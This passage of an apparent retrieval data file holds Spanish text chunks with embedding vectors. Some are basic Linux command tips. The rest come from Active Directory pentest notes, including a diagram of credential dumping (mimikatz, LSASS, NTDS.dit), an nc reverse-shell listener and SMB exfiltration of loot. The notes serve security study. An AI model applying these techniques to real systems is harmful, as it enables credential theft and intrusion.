"herramienta": "which", "perfil": "LINUX", "fichero": "tarea comun: which", "texto": "Para comprobar si un comando esta instalado: usa which. which comando dice donde esta, o nada si no esta. type comando tambien.", "v": [0.02165, 0.07154, -0.21485, -0.01494, 0.00804, -0.10565, 0.09613, 0.03087, -0.10197, -0.05331, -0.09856, -0.02322, 0.00989, -0.08171, 0.00766, 0.03642, 0.13136, 0.03027, 0.0625, -0.07383, 0.02641, 0.00255, 0.09714, -0.05058, 0.04244, 0.05517, 0.01629, -0.0739, -0.17025, -0.11369, 0.05195, 0.0835, 0.05109, -0.06633, -0.06802, 0.04932, -0.02826, -0.11961, -0.03554, 0.22588, -0.09472, -0.00357, -0.12631, 0.02868, -0.04176, -0.06261, 0.03672, -0.0422, 0.06554, -0.06376, 0.01288, -0.02431, -0.00045, -0.00793, -0.00156, -0.06376, 0.13682, 0.00165, 0.06547, -0.0364, -0.03564, -0.09875, 0.03059, 0.13572, -0.01606, 0.00131, -0.03476, -0.13608, -0.01696, -0.03861, -0.07349, 0.06223, -0.12056, 0.06753, 0.0105, -0.04168, -0.0221, 0.00206, 0.16405, -0.04158, -0.00581, 0.04167, -0.07809, -0.00742, -0.06987, -0.12387, -0.02744, -0.07637, -0.06784, -0.00989, -0.00073, -0.00086, 0.02341, 0.04564, 0.05855, 0.00819, 0.02045, 0.08138, 0.08772, 0.01292, 0.07007, 0.00481, -0.10157, 0.16564, 0.06384, 0.06641, 0.06717, -0.05451, -0.0023, 0.01529, 0.01776, -0.09088, 0.04626, -0.01795, -0.04048, -0.05908, -0.03752, -0.0726, -0.05901, -0.05055, -0.17933, 0.0175, 0.00531, 0.12243, 0.02544, -0.05284, -0.06705, 0.03637, 0.095, 0.0756, -0.05139, -0.02238, 0.07445, -0.09296, -0.04954, 0.17837, -0.02689, -0.00398, -0.08158, -0.09311, -0.00498, 0.12992, 0.01316, 0.01006, 0.05234, 0.00667, 0.02754, -0.06269, -0.02461, 0.03012, 0.0096, 0.12132, -0.01281, 0.05685, 0.02994, 0.0448, 0.03578, -0.03145, -0.00939, 0.0281, -0.03706, -0.02008, -0.02061, 0.04859, -0.02303, -0.02234, -0.07166, -0.04888, 0.0188, -0.01286, -0.05452, 0.02653, -0.02197, -0.0436, 0.02463, -0.09847, 0.03944, -0.0456, 0.01003, 0.01806, -0.0171, 0.08058, -0.03197, -0.01561, -0.05083, -0.02056, -0.00198, 0.00841, -0.02567, 0.01903, 0.03627, 0.03985, -0.02013, -0.02508, 0.01231, 0.00338, 0.00296, -0.0312, -0.02775, -0.04977, -0.07802, 0.0629, -0.023, -0.07982, 0.03469, -0.02839, 0.01011, 0.10101, -0.00011, 0.04225, 0.03075, -0.0138, 0.03, -0.03585, -0.06234, -0.05058, 0.02399, 0.02053, -0.03045, 0.0102, 0.00866, 0.03086, 0.04473, -0.00398, -0.00889, 0.00953, -0.04758, -0.00036, 0.0862, 0.08366, -0.03749, 0.00145, -0.0019, -0.03082, 0.02432, -0.00359, 0.02041, 0.03816, -0.03429, -0.07988, 0.00935, 0.04935, -0.0749, -0.09509, -0.08379, -0.07528, -0.11026, 0.01977, -0.01499, -0.05405, -0.00293, 0.05753, 0.01966, -0.07384, -0.02479, -0.06835]} +{"tipo": "tarea", "herramienta": "diff", "perfil": "LINUX", "fichero": "tarea comun: diff", "texto": "Para ver diferencias entre dos ficheros: usa diff. diff a b muestra las diferencias. diff -u formato de parche.", "v": [0.13664, -0.08816, -0.14638, -0.01708, 0.08874, 0.03883, 0.00711, -0.0484, -0.10044, -0.05179, 0.18707, -0.10528, -0.18364, -0.21078, 0.05243, -0.18287, 0.00989, -0.01813, -0.04027, -0.17186, 0.11591, -0.05687, 0.02988, -0.11299, -0.07347, -0.07898, -0.06362, -0.02307, -0.11965, -0.06392, 0.17119, 0.11283, 0.11867, 0.02309, -0.09244, 0.06056, 0.02572, -0.13002, 0.00185, 0.01835, -0.00994, 0.05715, -0.08052, 0.07112, -0.02639, -0.16317, -0.17406, 0.18976, 0.01858, 0.05406, 0.07762, 0.07813, -0.02377, 0.09088, -0.09191, -0.06946, 0.13493, 0.06526, 0.0121, 0.03772, -0.08257, 0.00523, 0.07206, -0.03201, 0.14865, -0.05958, -0.02137, -0.09792, 0.00814, -0.02748, -0.09772, -0.02106, 0.02406, -0.05164, -0.08189, 0.06949, 0.03481, -0.07485, -0.06162, 0.03564, -0.02991, 0.04508, -0.0052, 0.03855, 0.01546, -0.03539, 0.08123, 0.03666, -0.03737, -0.06664, 0.068, 0.04427, -0.00635, -0.02163, 0.03514, -0.07283, 0.03952, 0.04291, -0.04509, -0.03795, 0.05652, 0.03647, -0.08142, 0.01418, -0.03369, 0.10758, 0.06181, -0.03114, 0.01342, 0.04596, 0.06681, 0.04101, 0.00935, 0.0411, -0.00277, 0.06149, -0.02274, 0.04775, 0.00197, -0.02247, 5e-05, -0.05051, -0.05891, 0.05346, 0.07781, -0.06363, 0.04413, 0.06546, -0.09372, 0.09569, -0.03301, 0.03017, -0.04686, 0.01828, 0.0438, 0.05077, 0.00679, 0.02406, -0.00866, 0.01722, 0.03043, 0.00285, -0.03473, 0.03746, -0.04581, -0.07489, -0.02335, -0.06081, -0.12539, -0.00786, -0.0283, -0.04357, 0.08176, -0.05601, -0.0076, -0.05962, -0.02314, -0.10948, -0.03199, -0.01328, 0.03736, 0.01794, 0.06464, -0.02968, 0.03287, -0.02135, -0.04571, -0.04207, 0.04914, -0.01297, -0.02251, 0.07279, 0.01092, -0.02097, -0.01717, -0.00598, -0.05704, -0.00798, 0.02256, 0.05352, -0.0162, -0.02737, -0.02329, -0.00513, -0.0473, 0.00637, -0.06518, -0.0022, -0.05815, -0.03658, 0.00155, 0.07392, 0.03594, 0.01844, -0.02318, 0.01283, 0.04297, -0.07471, 0.05178, 0.06061, -0.00342, -0.05491, 0.02161, -0.03786, 0.0345, 0.00325, -0.03221, 0.01164, -0.00052, 0.04, 0.08701, -0.00558, -0.02609, 0.00541, -0.03053, 0.0051, 0.00516, 0.00408, 0.02405, -0.03412, -0.04304, 0.03121, -0.02404, -0.01494, 0.00334, 0.04845, -0.00773, -0.06597, 0.00069, 0.03703, 0.01469, 0.07649, 0.02215, -0.00726, 0.01345, 0.06437, 0.00113, -0.00585, -0.02174, -0.05061, 0.02677, -0.01869, -0.0388, 0.01271, -0.00356, 0.00488, -0.07502, 0.00483, -0.02433, -0.0403, -0.06847, -0.00232, 0.00063, -0.02024, -0.05037, -0.00497]} +{"tipo": "tarea", "herramienta": "wc", "perfil": "LINUX", "fichero": "tarea comun: wc", "texto": "Para contar lineas palabras o bytes: usa wc. wc -l lineas, wc -w palabras. cat fichero | wc -l cuenta lineas.", "v": [0.15487, -0.02113, -0.03717, -0.06953, -0.03159, -0.18468, -0.05236, -0.04301, 0.02896, -0.01833, 0.00768, -0.18297, 0.00872, 0.06354, 0.05654, 0.01334, 0.07129, -0.00843, 0.05325, -0.18565, -0.09747, -0.06553, -0.05, -0.03982, -0.03654, 0.09564, 0.07409, -0.11796, -0.02388, 0.14681, 0.01097, 0.1479, 0.06532, 0.01092, 0.01821, 0.0929, -0.11671, 0.12288, 0.08518, 0.08392, -0.03934, 0.07063, -0.10627, 0.12077, 0.04297, -0.19185, -0.00756, -0.02504, 0.09189, -0.10091, -0.05199, -0.13589, 0.01724, 0.16198, -0.09477, -0.01104, 0.15423, 0.15672, -0.06944, 0.04822, -0.02978, 0.07499, 0.06006, 0.06379, 0.05887, 0.09282, -0.0219, -0.01973, 0.05005, 0.03655, -0.03318, 0.10864, 0.04382, -0.029, 0.09729, -0.01885, -0.06315, -0.0766, 0.06503, 0.01481, -0.05649, 0.00023, 0.0103, -0.03188, 0.0226, 0.05891, 0.01477, -0.00603, 0.06043, 0.10415, 0.04901, -0.02452, -0.08219, -0.02466, -0.02152, -0.06209, -0.10263, 0.01795, 0.02202, 0.02101, -0.02642, -0.01671, -0.1263, -0.0031, -0.09075, 0.10077, -0.01531, 0.01248, -0.07366, -0.08801, 0.0565, -0.02954, 0.11662, -0.07238, -0.07839, -0.0041, -0.0081, 0.03239, -0.03153, -0.0667, 0.02094, 0.02543, -0.01953, 0.08426, -0.05073, 0.01248, -0.08798, -0.02691, -0.00407, 0.01021, 0.05842, 0.03928, 0.03446, -0.078, -0.05307, 0.08539, -0.01492, 0.03028, 0.02575, 0.02936, -0.03327, -0.01604, -0.16267, 0.04338, 0.04775, 0.09429, -0.002, -0.03734, -0.0865, 0.03497, 0.08536, -0.00539, 0.01102, -0.02196, 0.0221, 0.01359, 0.05782, 0.01968, -0.04998, 0.0241, -0.00794, -0.07443, -0.02484, -0.0453, -0.05077, -0.03711, -0.08017, 0.0302, 0.01247, -0.06388, -0.04777, -0.00324, 0.07019, -0.0111, -0.04339, 0.01973, 0.00772, 0.03666, -0.02859, -0.05001, -0.02023, -0.06276, -0.07816, -0.05376, -0.01955, -0.00702, -0.03087, -0.00996, 0.0195, -0.00328, -0.05972, 0.0226, -0.03422, -0.00158, -0.02408, -0.00671, -0.00908, 0.02406, -0.00224, -0.08554, -0.01736, 0.04359, 0.05363, -0.00747, 0.01347, -0.00482, 0.07501, -0.04856, -0.08835, -0.02726, 0.00921, -0.00681, -0.06077, -0.06926, -0.1005, -0.03947, -0.07692, 0.06084, 0.08877, 0.03267, -0.04879, 0.06462, 0.01139, -0.07024, 0.02954, -0.0481, -0.06299, -0.05443, -0.00712, 0.00903, -0.05, 0.00139, 0.01887, -0.03382, 0.05512, -0.04787, 0.0061, -0.03206, 0.01778, -0.02775, -0.00083, -0.04292, -0.06158, 0.00374, -0.0175, 0.01023, -0.03228, -0.01709, -0.05248, -0.0187, -0.00209, -0.04427, -3e-05, 0.01576, 0.01541, -0.06152]} +{"tipo": "tarea", "herramienta": "psql", "perfil": "LINUX", "fichero": "tarea comun: psql", "texto": "Para conectarse a una base de datos: usa psql. psql -U usuario base para Postgres. mysql -u usuario -p para MySQL.", "v": [-0.07087, -0.1237, -0.00976, -0.21512, 0.00801, -0.22082, -0.12198, -0.13295, -0.04292, -0.01372, -0.02333, -0.04499, 0.00671, 0.01099, -0.15171, -0.17226, -0.03193, 0.08826, 0.05552, -0.02427, 0.03866, -0.00578, -0.11894, -0.06169, -0.1103, 0.12984, 0.00518, -0.11361, -0.09793, -0.03575, -0.03508, -0.05892, -0.18945, -0.02655, -0.03282, -0.03322, -0.05743, 0.09944, 0.07422, 0.01614, -0.06437, 0.05677, -0.04991, 0.11744, 0.07239, -0.03563, 0.04902, -0.09705, 0.02622, -0.03018, -0.04425, -0.04614, -0.19714, -0.01535, -0.01922, 0.02177, 0.10621, -0.06129, 0.02218, 0.16688, -0.11999, -0.07754, -0.04388, 0.03002, -0.045, 0.05043, 0.06724, -0.06344, -0.03503, 0.14982, -0.01419, 0.09363, -0.08098, -0.1495, 0.0816, -0.03074, 0.12265, -0.02058, 0.05714, 0.05008, -0.15969, -0.1124, -0.0411, 0.06442, -0.04587, 0.00249, 0.02521, 0.05394, -0.02129, 0.07773, 0.12227, 0.07095, -0.00257, -0.06429, 0.00425, -0.03848, -0.05728, -0.12004, -0.01789, -0.03295, -0.03368, 0.05995, 0.05447, 0.09605, 0.02921, -0.01972, 0.06315, 0.05971, -0.04193, -0.03517, 0.07363, -0.08577, -0.06126, -0.06997, -0.03198, 0.03977, -0.01737, 0.04128, -0.06237, 0.04342, 0.01928, 0.01117, 0.05136, 0.02533, 0.00042, -0.03511, 0.00225, 0.01051, -0.03542, 0.0443, -0.04066, -0.05117, -0.04794, 0.03011, 0.02239, 0.09479, 0.01244, -0.07326, -0.03893, -0.00756, -0.06358, 0.03045, -0.1098, 0.00028, 0.04124, -0.0304, 0.00546, 0.05748, -0.09064, -0.01412, 0.01168, 0.04226, 0.04463, -0.06127, -0.02651, -0.01936, -0.00478, -0.01069, -0.06957, -0.01087, 0.04858, 0.03575, -8e-05, 0.01927, -0.02007, -0.06199, -0.00044, -0.00555, 0.02875, -0.02494, 0.05138, -0.00355, 0.04247, -0.093, 0.04438, -0.01202, -0.0243, -0.01774, -0.03028, 0.03647, 0.08705, -0.06437, 0.03848, -0.03578, -0.02047, 0.01532, 0.05168, 0.00581, -0.00848, -0.06829, -0.05001, 0.02813, 0.0167, -0.02527, 0.08487, -0.02531, 0.00937, -0.0404, -0.00343, -0.00115, -0.01425, 0.01009, -0.04905, 0.0565, -0.00396, 0.00557, -0.01, -0.00094, 0.00463, -0.13185, 0.00881, 0.0312, -0.00724, 0.00795, -0.00564, -0.02361, -0.04148, 0.02146, 0.05576, 0.00453, -0.12325, 0.04873, -0.00755, 0.02137, -0.03133, -0.0219, -0.06496, -0.06018, 0.01491, -0.01744, -0.00762, -0.04022, -0.00049, -0.01257, 0.00547, -0.03657, -0.05553, -0.00853, 0.00728, 0.00554, 0.00786, 0.02433, -0.03095, 0.00132, 0.00677, 0.01179, -0.0582, 0.03658, -0.01904, -0.03929, 0.01638, -0.07291, 0.00695, -0.04308, -0.06346, 0.0351]} +{"tipo": "tarea", "herramienta": "who", "perfil": "LINUX", "fichero": "tarea comun: who", "texto": "Para ver quien esta conectado: usa who. who los usuarios. w con lo que hacen.", "v": [-0.04258, 0.15221, -0.03983, 0.06916, -0.08298, -0.04029, -0.00233, -0.12728, 0.02618, -0.12805, -0.08697, -0.16127, 0.00917, 0.08757, -0.02181, -0.02185, 0.06445, 0.23193, 0.18487, -0.09751, -0.03425, 0.10994, 0.11409, -0.14041, -0.10754, -0.02362, -0.00295, -0.0495, -0.04319, -0.01854, 0.01433, -0.08158, -0.02156, -0.04844, 0.03671, 0.01838, 0.02064, 0.15674, 0.11939, 0.27365, 0.00136, 0.05317, -0.11744, -0.02849, 0.10295, 0.01402, -0.08389, -0.11721, 0.02328, 0.12844, -0.15839, 0.05803, -0.09958, 0.04546, 0.04486, -0.06819, 0.07855, -0.09259, 0.01001, 0.04643, -0.10842, -0.00277, -0.00397, 0.04912, -0.03396, -0.09317, 0.00945, -0.00169, -0.03078, 0.03062, 0.08819, 0.06058, -0.01651, -0.04429, 0.02974, 0.15535, -0.01707, -0.06569, 0.01742, 0.00995, 0.02549, -0.02255, -0.04075, -0.0574, -0.05209, -0.00738, 0.04558, 0.08465, -0.03076, 0.03866, 0.122, 0.05148, -0.0679, -0.06517, 0.00752, -0.02167, 0.02016, -0.01771, 0.03477, 0.05028, 0.10854, 0.03977, 0.00556, 0.13032, 0.00086, -0.07093, 0.05058, 0.00381, -0.05699, 0.02665, 0.07619, -0.07148, -0.04719, -0.01592, -0.02034, 0.08106, -0.04002, -0.08407, -0.08063, -0.04088, -0.03801, -0.02406, 0.01094, -0.0391, -0.00485, -0.01293, -0.00836, 0.03759, 0.00805, 0.0474, -0.04514, -0.12463, -0.02072, -0.10593, 0.00493, -0.00482, 0.0334, -0.03183, -0.02895, 0.03539, 0.02761, 0.02043, -0.03486, -0.07536, 0.03277, 0.00969, 0.01548, -0.00581, -0.09429, -0.0451, -0.00648, 0.05703, -0.02216, -0.01949, 0.0303, 0.05621, 0.02241, -0.06544, -0.05993, 0.0061, -0.07257, -0.0183, 0.04927, -0.08854, -0.0885, -0.02237, -0.05726, -0.03017, 0.07722, 0.02457, 0.00924, 0.05986, -0.01049, -0.02758, 0.08061, -0.03389, 0.03418, -0.08827, -0.00502, 0.02521, -0.02985, -0.05242, -0.00535, 0.0134, -0.06712, -0.0146, 0.045, 0.06545, -0.0039, 0.05355, -0.01405, -0.02459, -0.02488, 0.03962, 0.06682, 0.00688, -0.03567, -0.01055, -0.0288, -0.06062, -0.02351, -0.01121, 0.02229, 0.04494, 0.01042, 0.0241, 0.09044, -0.02304, 0.03401, 0.06152, 0.07603, -0.01247, -0.04548, -0.03533, -0.09221, 0.01621, -0.00054, -0.01605, -0.02297, 0.00324, -0.00547, 0.0401, 0.01502, 0.03961, 0.01775, 0.04187, -0.00421, -0.02084, -0.0133, -0.00467, -0.05651, -0.03636, -0.0182, 0.00162, -0.02154, -0.02265, -0.00554, 0.00979, -0.07936, -0.08555, -0.02497, 0.05894, -0.04263, -0.03605, -0.06091, -0.00954, -0.09899, 0.03865, -0.03525, -0.06427, -0.01122, 0.01916, 0.04259, -0.06432, 0.02815, -0.02396]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "# Apuntes Active Directory Pentest\n\nMimikatz · Impacket · Kerberos · BloodHound · Pivoting\n\n---", "v": [-0.32305, -0.11849, 0.0726, -0.10303, 0.08733, -0.02996, -0.08532, 0.01578, -0.15201, 0.00523, 0.15515, 0.05585, -0.06906, -0.03079, 0.09464, -0.04401, -0.12373, -0.07533, 0.09895, -0.07148, -0.01744, 0.10713, -0.12581, 0.05867, 0.01628, 0.18562, 0.08235, 0.15192, 0.03359, -0.04584, -0.1194, -0.12402, -0.03836, 0.03056, -0.00494, -0.17394, -0.06503, 0.02794, 0.18763, 0.17709, -0.07027, 0.12318, 0.05461, 0.03613, 0.06734, 0.06291, 0.05978, -0.07287, 0.04157, 0.0644, -0.02092, 0.02816, -0.08931, 0.00903, -0.01424, 0.04786, -0.06939, -0.06121, -0.13734, -0.01079, 0.04792, -0.07998, -0.14897, -0.08459, 0.02918, -0.04035, 0.00694, -0.08483, -0.0262, 0.12182, 0.01243, 0.02405, 0.15688, 0.04397, 0.04584, -0.0528, 0.09712, -0.0578, -0.01033, 0.06668, -0.04055, 0.0375, 0.00281, -0.02367, 0.00767, -0.13245, 0.02611, -0.03405, -0.02241, 0.03783, 0.02304, -0.00428, -0.0006, 0.05827, -0.10536, -0.00335, -0.09533, 0.03082, 0.07318, -0.07416, -0.03107, 0.01071, -0.10714, 0.05123, 0.0515, -0.04344, -0.09342, 0.08971, -0.01497, -0.03721, 0.11141, 0.01672, 0.0224, -0.05055, -0.00533, 0.07652, 0.06048, -0.00603, 0.0755, 0.01081, 0.00059, 0.05934, 0.0669, 0.03508, -0.04785, -0.073, -0.00989, -0.01112, 0.02166, 0.02883, -0.01026, 0.10987, -0.00555, -0.05651, 0.04437, 0.01512, 0.00694, 0.01123, 0.03713, -0.04204, -0.07561, -0.06639, -0.01463, 0.06211, -0.02206, 0.02542, -0.00472, 0.00089, 0.04676, 0.05016, -0.05587, 0.01799, -0.03973, -0.04672, 0.04897, 0.0166, 0.0611, 0.04234, -0.04096, -0.01263, -0.01073, -0.02266, 0.02297, 0.00457, -0.00719, 0.08498, 0.00973, -0.00346, 0.00472, -0.02785, 0.01858, 0.02097, -0.00065, 0.00381, 0.00785, -0.03738, 0.05771, -0.02218, -0.0075, -0.03165, 0.03609, -0.01947, -0.06475, 0.02045, 0.00123, 0.01134, 0.04982, 0.0155, 0.03183, -0.07805, 0.06569, -0.00159, 0.06702, -0.0621, 0.00047, 0.02598, 0.06182, -0.05567, -0.02221, -0.04159, 0.016, 0.02492, 0.00176, 0.00534, 0.06667, 0.01244, -0.03403, 0.02866, 0.00993, -0.02803, -0.02729, -0.01352, 0.05339, 0.03857, -0.02284, 0.00069, -0.02866, -0.05469, -0.01891, 0.00161, -0.03202, 0.0356, -0.00291, 0.02842, 0.01027, 0.04764, -0.00111, -0.04017, 0.00174, -0.00322, 0.0073, -0.00409, -0.02906, 0.0245, -0.02931, -0.01099, 0.00168, 0.04269, -0.01224, 0.0053, 0.03226, 0.01306, 0.02594, -0.01557, -0.03913, -0.08654, 0.00975, 0.02624, 0.01053, -0.02779, -0.00889, -0.07235, -0.05235, -0.03469, -0.01381, -0.01058]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "## El mapa mental de todo", "v": [0.02654, -0.00462, 0.04387, -0.03957, -0.14077, 0.02389, -0.18514, 0.0578, -0.15386, 0.03409, -0.0564, 0.08148, 0.15232, 0.04604, -0.02543, 0.0992, 0.16294, 0.04727, -0.02119, -0.12134, -0.17238, 0.01815, -0.08736, 0.03627, 0.06026, -0.03271, -0.03914, 0.1302, -0.02472, 0.00655, 0.02084, 0.13835, -0.05008, -0.10442, 0.04444, 0.06008, 0.1768, 0.09808, -0.05979, -0.07293, -0.05801, 0.01683, 0.00601, 0.01326, 0.04002, -0.0914, 0.02067, -0.0048, 0.01682, 0.092, -0.03618, 0.01095, -0.04637, -0.06741, 0.10467, -0.01522, -0.02699, -0.03883, 0.06587, -0.06204, -0.13528, -0.09359, -0.07283, -0.00075, -0.017, 0.08184, 0.12919, 0.0482, -0.02787, 0.0714, -0.13251, 0.0585, 0.01648, -0.13898, 0.09359, -0.07542, -0.03235, -0.03716, 0.07434, 0.04746, -0.04059, -0.05957, -0.01101, 0.01474, -0.05415, -0.02079, -0.05687, -0.03474, 0.01471, -0.08216, -0.03904, 0.04435, -0.00262, 0.01625, -0.02204, 0.02285, -0.02095, 0.12355, -0.01468, 0.05771, 0.0057, -0.06746, -0.08843, -0.01479, -0.05357, -0.06387, 0.00712, -0.01763, -0.04051, 0.08521, 0.01206, 0.02122, -0.08315, 0.03483, -0.0388, -0.01964, 0.01107, 0.09785, 0.10549, 0.02562, -0.01661, 0.00017, 0.05551, -0.02352, 0.02894, 0.02511, -0.05036, -0.084, 0.10519, 0.02995, -0.00159, 0.00819, -0.03296, -0.02464, -0.08028, 0.07725, -0.03999, 0.08438, 0.05082, -0.03052, -0.01128, -0.003, 0.06995, -0.03634, -0.11612, 0.0474, -0.00603, -0.04546, -0.00018, 0.09869, -0.01257, 0.11319, 0.11013, -0.0714, 0.064, 0.01798, 0.00721, -0.10976, -0.05647, 0.00793, 0.00816, -0.025, 0.03382, 0.12881, -0.03054, 0.02313, 0.00392, -0.01079, 0.03463, 0.09981, -0.02545, -0.09422, 0.11205, -0.0381, 0.08838, -0.03712, -0.03016, 0.01355, 0.00656, 0.06067, -0.02786, -0.04748, 0.10529, 0.00613, -0.08981, 0.04654, 0.00801, 0.02505, 0.05881, -0.13324, -0.06585, -0.01446, -0.07198, -0.01892, 0.09818, -0.02475, 0.03076, 0.09821, -0.01931, -0.02589, -0.01937, -0.03874, 0.00676, -0.01411, -0.09362, 0.07052, 0.03953, 0.00681, 0.01329, 0.04319, -0.07126, -0.1309, -0.00389, -0.12121, -0.01182, -0.04465, -0.05238, -0.04131, 0.03957, 0.00272, -0.06298, 0.05604, -0.01711, 0.04361, -0.00497, 0.07051, 0.02997, 0.01888, 0.00371, 0.00364, -0.02184, -0.03839, 0.01958, 0.01531, 0.07304, -0.02256, 0.01954, -0.01187, 0.0189, -0.08123, -0.00263, 0.0033, 0.01112, 0.00935, -0.01168, 0.01274, -0.00469, -0.03947, 0.01458, -0.00093, -0.02838, 0.01627, 0.00302, 0.0077, -0.00659, 0.03072]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "```\n ┌─────────────────────────────┐ ┌──────────────────────────────┐\n │ TU KALI/DEBIAN │ │ VICTIMA WINDOWS │\n │ (la atacante) │ │ (cliente o servidor) │\n ├─────────────────────────────┤ ├──────────────────────────────┤\n │ │ │ │\n │ ┌─ Impacket ─────────────┐ │ │ ┌─ Procesos a saquear ─┐ │\n │ │ secretsdump (hashes) ├──┼─────┼──┤ LSASS (creds en RAM) │ │\n │ │ psexec (shell) ├──┼─SMB─┼──┤ NTDS.dit (BD usuarios)│ │\n │ │ GetUserSPNs (kerb) ├──┼─────┼──┤ SAM/SYSTEM │ │\n │ │ getTGT (kerb) │ │ │ └──────────────────────┘ │\n │ └────────────────────────┘ │ │ │\n │ │ │ ┌─ Lo que SUBES tú ────┐ │\n │ ┌─ BloodHound ───────────┐ │ │ │ mimikatz.exe │ │\n │ │ sharphound (recolecta) ├──┼─LDAP┼──┤ winPEAS │ │\n │ │ neo4j + GUI (visualiza)│ │ │ │ Invoke-ConPtyShell.ps1│ │\n │ └────────────────────────┘ │ │ │ Invoke-PowerShellTcp │ │\n │ │ │ └──────────────────────┘ │\n │ ┌─ Listener / loot ──────┐ │ │ │\n │ │ nc -lvnp 4444 (shell) │◄─┼─TCP─┼─── reverse shell │\n │ │ python3 -m http.server │◄─┼─HTTP┼─── descargan tus tools │\n │ │ smbserver.py (loot) │◄─┼─SMB─┼─── exfiltras NTDS.dit, etc. │\n │ └────────────────────────┘ │ │ │\n └─────────────────────────────┘ └──────────────────────────────┘\n```", "v": [-0.32564, -0.04603, 0.12983, 0.07479, 0.07661, -0.15595, -0.07931, -0.06819, 0.06281, -0.01067, -0.13961, 0.01329, 0.04043, -0.04907, -0.10371, -0.02096, -0.0589, -0.09945, -0.08681, 0.08586, 0.00887, -0.00173, -0.11153, -0.03918, -0.0109, 0.03987, -0.07159, 0.03781, -0.07365, 0.01657, -0.10007, 0.06086, -0.23972, 0.07063, -0.05704, -0.00584, -0.09689, -0.02905, -0.02711, 0.22156, -0.00707, 0.00457, -0.11438, 0.09527, -0.08403, -0.02665, 0.04217, 0.01812, -0.05215, -0.14658, -0.082, -0.06572, 0.02167, -0.04998, -0.0027, 0.0003, 0.11809, -0.08909, -0.06691, -0.11181, 0.0853, 0.04716, 0.03291, -0.04444, -0.01564, -0.07998, 0.09932, -0.06602, -0.01991, -0.05027, -0.11167, -0.05854, 0.02742, -0.08411, 0.04772, -0.09801, 0.09405, -0.08785, -0.01685, 0.03225, 0.01149, -0.14257, -0.14153, 0.01185, 0.04076, -0.14495, 0.10712, -0.08511, -0.05073, -0.00502, -0.02162, 0.01457, -0.01224, 0.07183, -0.02859, -0.08028, 0.01801, -0.03387, 0.02402, -0.01941, 0.0813, -0.00325, -0.03483, -0.00937, 0.07697, -0.0379, -0.01203, 0.0298, 0.04797, 0.02396, 0.04722, -0.0293, 0.04403, -0.08891, -0.01076, 0.06123, -0.04835, 0.06043, 0.05976, -0.00453, 0.00244, -0.04319, -0.00282, 0.02382, 0.04646, -0.03042, 0.01873, 0.08605, -0.02576, 0.0219, 0.06163, 0.05138, -0.0612, -0.02348, 0.02941, 0.07574, 0.09523, -0.00614, 0.05604, 0.06666, -0.03191, -0.10316, 0.07359, 0.02639, 0.07088, 0.10382, 0.05531, -0.05495, -0.04056, 0.01959, 0.03706, 0.11109, -0.01497, -0.01238, 0.00268, 0.02828, 0.03031, -0.05573, -0.03018, 0.02159, 0.01084, 0.0899, 0.03168, 0.04471, -0.03121, 0.01873, 0.04445, 0.03839, 0.05028, -0.0334, -0.01272, -0.01585, 0.02877, 0.05811, -0.0203, -0.02154, 0.05534, 0.00342, 0.08242, 0.01952, -0.00865, -0.01122, 0.0267, 0.01683, -0.04247, -0.01582, -0.08232, -0.0509, 0.07147, -0.01607, -0.01028, 0.03278, -0.0172, 0.01823, 0.00995, 0.01284, 0.02263, 0.03077, 0.06986, 0.05001, 0.00801, 0.0698, 0.00623, -0.05965, 0.05159, -0.02771, 0.01067, 0.05027, -0.02208, 0.01378, 0.05459, -0.03267, 0.03519, -0.06534, -0.04126, 0.00577, 0.01617, 0.00947, -0.01683, -0.01599, -0.00605, -0.00463, 0.07035, -0.00635, 0.0237, 0.05887, 0.02085, -0.01003, 0.00905, -0.06861, 0.00265, -0.0009, -0.01281, -0.06243, 0.02955, 0.04432, -0.04551, -0.01339, -0.02287, -0.04258, 0.02654, 0.01623, -0.023, -0.07441, -0.04235, -0.038, -0.0762, 0.01735, -0.00896, -0.00788, 0.00569, 0.01352, 0.03242, -0.01797, 0.00877, -0.04862]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "**Idea clave**: tú no tienes \"GUI\" central. Cada herramienta es **independiente** y se comunica por **red** con la víctima. Tu Kali es un puesto de mando con muchos terminales abiertos a la vez.\n\n---", "v": [-0.08737, 0.02782, -0.18082, -0.03563, 0.01484, -0.17485, -0.13161, 0.08159, -0.0445, -0.04759, -0.09374, -0.08078, 0.01521, 0.03035, 0.08728, 0.06594, 0.07318, -0.1268, 0.16318, -0.04511, 0.00401, 0.00164, -0.06468, -0.05034, -0.03514, 0.05385, 0.03596, -0.14537, -0.03019, 0.00462, 0.06881, -0.10114, 0.0131, -0.1023, -0.0422, -0.0722, -0.07168, 0.06556, 0.00127, 0.04314, 0.04244, 0.03926, -0.10689, 0.03038, 0.14868, -0.06659, 0.04789, 0.01941, 0.07045, 0.10838, -0.02186, -0.18043, -0.09074, -0.13836, 0.03963, -0.08368, 0.24245, 0.0454, 0.00961, -0.13358, 0.06894, 0.05691, 0.02899, 0.09385, 0.08148, -0.06402, 0.06515, -0.03442, -0.07424, 0.06435, 0.03774, -0.0188, -0.05814, -0.00518, 0.04857, -0.05359, -0.03047, 0.00059, 0.11735, 0.07704, 0.03999, -0.05922, -0.0804, -0.02191, -0.00783, -0.09944, 0.09816, -0.06326, -0.07341, -0.04777, 0.14482, 0.00348, 0.01392, 0.08437, 0.06826, -0.01388, -0.03133, -0.04151, 0.00549, -0.02455, 0.1627, 0.01078, -0.06906, 0.03094, 0.08132, -0.02799, 0.01315, -0.03517, 0.02213, -0.01603, -0.02272, -0.01723, 0.1136, 0.00982, -0.08419, -0.00056, -0.00869, -0.0163, -6e-05, -0.04597, 0.07117, 0.00176, 0.02872, -0.00597, -0.02524, -0.03281, -0.14483, 0.01454, 0.07412, 0.02006, 0.01307, -0.02772, 0.04163, -0.00456, 0.02459, 0.05669, 0.05112, -0.07043, 0.0212, -0.00192, -0.03982, 0.00518, -0.0051, -0.10769, 0.05465, 0.0214, 0.03815, -0.04677, -0.04238, 0.07395, 0.02266, 0.02194, -0.00076, 0.05375, -0.02006, 0.03436, -0.04028, -0.03352, -0.05573, 0.08394, -0.0415, -0.02607, 